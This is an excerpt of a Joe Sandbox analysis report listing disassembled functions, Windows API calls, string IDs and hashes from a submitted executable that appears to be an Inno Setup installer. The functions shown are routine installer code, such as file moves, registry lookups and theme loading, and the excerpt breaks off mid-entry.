                                                          • API ID: FocusMessageStateTextWaitWindow
                                                          • String ID: Wnd=$%x
                                                          • API String ID: 1381870634-2927251529
                                                          • Opcode ID: 84218ba3482459bc906772e13e797513dd116e5c3cf85ca98293f9821701720b
                                                          • Instruction ID: 5f1c8258d991fabeb8ce52e8cfeede19b84d8dc0ceec509adeab196e5a3e054a
                                                          • Opcode Fuzzy Hash: 84218ba3482459bc906772e13e797513dd116e5c3cf85ca98293f9821701720b
                                                          • Instruction Fuzzy Hash: C011C430644645AFC700FBA5D845A9E7BF8EB49304B5184BEF408E7651DB386D00CA69
                                                          APIs
                                                          • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E438
                                                          • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E447
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Time$File$LocalSystem
                                                          • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                          • API String ID: 1748579591-1013271723
                                                          • Opcode ID: 45f4a363f224ef8c5fed3f77cd0aa38b31e29c1c09915091c8c286ec18076b3a
                                                          • Instruction ID: 72319f5cb05664b7e116556de8a44c1f4f08e856cbf185e3f572017f7e9d6813
                                                          • Opcode Fuzzy Hash: 45f4a363f224ef8c5fed3f77cd0aa38b31e29c1c09915091c8c286ec18076b3a
                                                          • Instruction Fuzzy Hash: 3011F8A440C3919ED340DF6AC44432BBAE4AB99708F04896FF9C8D6381E779C948DB77
                                                          APIs
                                                          • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F57
                                                            • Part of subcall function 00406F40: DeleteFileA.KERNEL32(00000000,0049B628,00497BFD,00000000,00497C52,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F4B
                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 00453F7C
                                                            • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesDeleteErrorLastMove
                                                          • String ID: DeleteFile$MoveFile
                                                          • API String ID: 3024442154-139070271
                                                          • Opcode ID: b1543e803949c7e0bc7b6baa6fe4679c95893f4373d9700be0af1e5a7050e6bf
                                                          • Instruction ID: d61ccdf94e8101ca60a50ffa5b16d74e098655775539a7d8992e0f9997158dc0
                                                          • Opcode Fuzzy Hash: b1543e803949c7e0bc7b6baa6fe4679c95893f4373d9700be0af1e5a7050e6bf
                                                          • Instruction Fuzzy Hash: E6F062716041045BD701EBA2D94266EA3ECEB8430EFA0403BB900BB6C3DA3C9E09452D
                                                          APIs
                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004592C1,00000000,00459479,?,00000000,00000000,00000000), ref: 004591D1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen
                                                          • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                          • API String ID: 47109696-2631785700
                                                          • Opcode ID: a4f8ebe625aa4241feead5212253246ce33a71640870ef86989e33138b66f8c9
                                                          • Instruction ID: b3b7ca93e3ee9f71f5f4917cf459f66c0bdee831e94fc7924cf2246e82346dcf
                                                          • Opcode Fuzzy Hash: a4f8ebe625aa4241feead5212253246ce33a71640870ef86989e33138b66f8c9
                                                          • Instruction Fuzzy Hash: 11F0A431300151EBD710EB5AD895B5E7698DB95356F50453BF940CB253C67CCC058B59
                                                          APIs
                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                          • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004831C1
                                                          • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004831E4
                                                          Strings
                                                          • System\CurrentControlSet\Control\Windows, xrefs: 0048318E
                                                          • CSDVersion, xrefs: 004831B8
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                          • API String ID: 3677997916-1910633163
                                                          • Opcode ID: 8c4194736c198406f1c4615c9bef297240f0128b093a56b4b0574b173b8ea383
                                                          • Instruction ID: 86ea9b687bc925f919ffd8904499e524e0617f710df10bb4bfec30536caacf1e
                                                          • Opcode Fuzzy Hash: 8c4194736c198406f1c4615c9bef297240f0128b093a56b4b0574b173b8ea383
                                                          • Instruction Fuzzy Hash: 84F03175E40208A6DF10EAE18C49BAF73BCAB04F05F104567E910E7281EB7AAB048B59
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B2E,00000000,00453BD1,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FC1,00000000), ref: 0042D902
                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D908
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                          • API String ID: 1646373207-4063490227
                                                          • Opcode ID: 7b96dfeca4fb46ac12370e2a7164d548b2292eba5de3f20d368527ccba0e5576
                                                          • Instruction ID: 46d83308b3a0af851ef73fb55c1ff88b015d3a0f0a3b668622d7e336d39da5d8
                                                          • Opcode Fuzzy Hash: 7b96dfeca4fb46ac12370e2a7164d548b2292eba5de3f20d368527ccba0e5576
                                                          • Instruction Fuzzy Hash: F2E0DFE0B00B4122D720257A1C82B5B10894B84768FA0043B3888E52D6EDBCDD841A2D
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAC8), ref: 0042EB5A
                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB60
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                          • API String ID: 1646373207-260599015
                                                          • Opcode ID: 3e5cb9d7abe0ff9b6486504588ced90e5b8f05a967361d48d4fc2df467991dfe
                                                          • Instruction ID: e22649ab5c5d02c0682c512352339c2c95c689ad11c13297e1ab925b23cbcb3c
                                                          • Opcode Fuzzy Hash: 3e5cb9d7abe0ff9b6486504588ced90e5b8f05a967361d48d4fc2df467991dfe
                                                          • Instruction Fuzzy Hash: B8D0C793711732566910B5FB3CD1DEB098C895427A39400B7F615E5541D55DDC1119AC
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004980FE), ref: 0044F777
                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F77D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: NotifyWinEvent$user32.dll
                                                          • API String ID: 1646373207-597752486
                                                          • Opcode ID: c1ce619e6872abdf5b4899d5f27880f5dd90b76e17064dac08d73993ed60d4d7
                                                          • Instruction ID: 704f9416b83fe6db864644e5aa21ade638d5456887e5d0d6230baff76c02d14e
                                                          • Opcode Fuzzy Hash: c1ce619e6872abdf5b4899d5f27880f5dd90b76e17064dac08d73993ed60d4d7
                                                          • Instruction Fuzzy Hash: 7DE012F0E4174499FB00BBB97A4671E3AD0E7A471CB00017FF454A62A1DB7C44184F9D
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498154,00000001,00000000,00498178), ref: 00497E7E
                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00497E84
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: DisableProcessWindowsGhosting$user32.dll
                                                          • API String ID: 1646373207-834958232
                                                          • Opcode ID: d26faf3502760f2b8304c8b29f1b377702d6f34381249b52cb9d82fc0845b7a8
                                                          • Instruction ID: a447a91dd4d4791f70ca82ece540bd513dbb2543541ea1319c0fea98b289aaf7
                                                          • Opcode Fuzzy Hash: d26faf3502760f2b8304c8b29f1b377702d6f34381249b52cb9d82fc0845b7a8
                                                          • Instruction Fuzzy Hash: 61B09280668712549C0032F30C02B2B0C094840728B1000B73414A00C6CE6C9C004A3D
                                                          APIs
                                                            • Part of subcall function 0044B650: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F76D,004980FE), ref: 0044B677
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B68F
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A1
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6B3
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6C5
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6D7
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6E9
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B6FB
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B70D
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B71F
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B731
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B743
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B755
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B767
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B779
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B78B
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B79D
                                                            • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7AF
                                                          • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498126), ref: 0046442B
                                                          • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464431
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$LibraryLoad
                                                          • String ID: SHPathPrepareForWriteA$shell32.dll
                                                          • API String ID: 2238633743-2683653824
                                                          • Opcode ID: 25a4dc9541e494d4f478376088f4118d6a1224d0a714e6d5fca985b35bc39c4d
                                                          • Instruction ID: 48aea337371b5dbca44804c24081d1198016d0c57ab59c55e23a700f58ea278e
                                                          • Opcode Fuzzy Hash: 25a4dc9541e494d4f478376088f4118d6a1224d0a714e6d5fca985b35bc39c4d
                                                          • Instruction Fuzzy Hash: 89B092A0640705A8CD047BB21857B0F2A4494A0B18790423B301475083EF7C88205A5E
                                                          APIs
                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0047CFD4,?,?,?,?,00000000,0047D129,?,?,?,00000000,?,0047D238), ref: 0047CFB0
                                                          • FindClose.KERNEL32(000000FF,0047CFDB,0047CFD4,?,?,?,?,00000000,0047D129,?,?,?,00000000,?,0047D238,00000000), ref: 0047CFCE
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileNext
                                                          • String ID:
                                                          • API String ID: 2066263336-0
                                                          • Opcode ID: 9f09813f7918e7f3537418bbdf228f62d8dd8a495373f8467bf1863306f2bb6d
                                                          • Instruction ID: d4706787225a87a8d466f388a3eb94f1c6a992d4ef98e923761ffbb9731f628b
                                                          • Opcode Fuzzy Hash: 9f09813f7918e7f3537418bbdf228f62d8dd8a495373f8467bf1863306f2bb6d
                                                          • Instruction Fuzzy Hash: 32814B70D0024DAFCF11DF95CC91ADFBBB9EF49308F5080AAE808A7291D6399A46CF55
                                                          APIs
                                                            • Part of subcall function 0042EE28: GetTickCount.KERNEL32 ref: 0042EE2E
                                                            • Part of subcall function 0042EC80: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECB5
                                                          • GetLastError.KERNEL32(00000000,00475509,?,?,0049C1D0,00000000), ref: 004753F2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CountErrorFileLastMoveTick
                                                          • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                          • API String ID: 2406187244-2685451598
                                                          • Opcode ID: 7dd558b458d748696a875524af4e195e3f09e273ab8622730eb0a1e32a8ceb2d
                                                          • Instruction ID: 7c456f6db07972d04682c0112793eede51d985a58d5564732b5c120557be107c
                                                          • Opcode Fuzzy Hash: 7dd558b458d748696a875524af4e195e3f09e273ab8622730eb0a1e32a8ceb2d
                                                          • Instruction Fuzzy Hash: 5D419670A006099BCB10EFA5D882ADF77B5EF48314F608537E404BB355E7B89E458BAD
                                                          APIs
                                                          • GetDesktopWindow.USER32 ref: 00413D3E
                                                          • GetDesktopWindow.USER32 ref: 00413DF6
                                                            • Part of subcall function 00418EB8: 6F59C6F0.COMCTL32(?,00000000,00413FBB,00000000,004140CB,?,?,0049B628), ref: 00418ED4
                                                            • Part of subcall function 00418EB8: ShowCursor.USER32(00000001,?,00000000,00413FBB,00000000,004140CB,?,?,0049B628), ref: 00418EF1
                                                          • SetCursor.USER32(00000000,?,?,?,?,00413AEB,00000000,00413AFE), ref: 00413E34
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CursorDesktopWindow$Show
                                                          • String ID:
                                                          • API String ID: 2074268717-0
                                                          • Opcode ID: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
                                                          • Instruction ID: 9b0def8c9c64a2c96ee02a3ab3d0705208e3fbe4449c9c566199a376d490666d
                                                          • Opcode Fuzzy Hash: d2c454668ecaa59f130cbdc0d7f98644b71464a6bea9d144c6b553ceac200a13
                                                          • Instruction Fuzzy Hash: D2411931600210AFC710DF2AFA84B5677A5EB69329B16807BE405CB365DB38ED81CF9C
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A65
                                                          • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AD4
                                                          • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B6F
                                                          • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BAE
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: LoadString$FileMessageModuleName
                                                          • String ID:
                                                          • API String ID: 704749118-0
                                                          • Opcode ID: 6e4d3cb753bdbb9908acc8cdd2b86980fc3448728ff30d06669c4a0ffee8011d
                                                          • Instruction ID: 89cba0e7522a9b83fcc2071cfb28f1965358b02fab5b9b8693395207a1b0bde5
                                                          • Opcode Fuzzy Hash: 6e4d3cb753bdbb9908acc8cdd2b86980fc3448728ff30d06669c4a0ffee8011d
                                                          • Instruction Fuzzy Hash: A63110716083809AD330EB65CA45B9FB7D8AB85704F44483FB6C8E72D1DB7899048B6B
                                                          APIs
                                                          • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E905
                                                            • Part of subcall function 0044CF48: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF7A
                                                          • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E989
                                                            • Part of subcall function 0042BBAC: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC0
                                                          • IsRectEmpty.USER32(?), ref: 0044E94B
                                                          • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E96E
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                          • String ID:
                                                          • API String ID: 855768636-0
                                                          • Opcode ID: 0b47e4e74fbaa274a2738fa508d6e527e1083de5c38dc3a313e3f8e812d9ff7d
                                                          • Instruction ID: fae584cc962e85b422f7b584321c3529105593e75d7f1ff9ae22b75d4be52dd2
                                                          • Opcode Fuzzy Hash: 0b47e4e74fbaa274a2738fa508d6e527e1083de5c38dc3a313e3f8e812d9ff7d
                                                          • Instruction Fuzzy Hash: F1116A71B4030067E610BA3A8C86B5B76C99B98748F15093FB505EB3C2DE7DDC0983A9
                                                          APIs
                                                          • OffsetRect.USER32(?,?,00000000), ref: 00494E94
                                                          • OffsetRect.USER32(?,00000000,?), ref: 00494EAF
                                                          • OffsetRect.USER32(?,?,00000000), ref: 00494EC9
                                                          • OffsetRect.USER32(?,00000000,?), ref: 00494EE4
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: OffsetRect
                                                          • String ID:
                                                          • API String ID: 177026234-0
                                                          • Opcode ID: 6561eb4d383449756189e8e73bad2b2324663fde54b6a94536ab2f09e4d2584d
